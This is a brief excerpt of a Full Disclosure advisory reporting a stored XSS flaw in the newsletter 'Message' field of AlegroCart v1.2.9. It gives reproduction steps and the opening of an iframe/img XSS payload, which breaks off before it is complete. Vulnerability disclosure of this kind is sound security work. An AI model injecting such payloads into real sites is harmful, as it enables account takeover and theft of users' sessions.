Stored XSS in “Message” Functionality – AlegroCartv1.2.9  – Full Disclosure

Posted by Andrey Stoykov on Apr 23

# Exploit Title: Stored XSS in “Message” Functionality – alegrocartv1.2.9
# Date: 04/2025
# Exploit Author: Andrey Stoykov
# Version: 1.2.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Login as demonstrator account and visit “Customers” > “Newsletter”
2. In “Message” use the following XSS payload

<iframe srcdoc=”<img src=x…
 – Read More  – Full Disclosure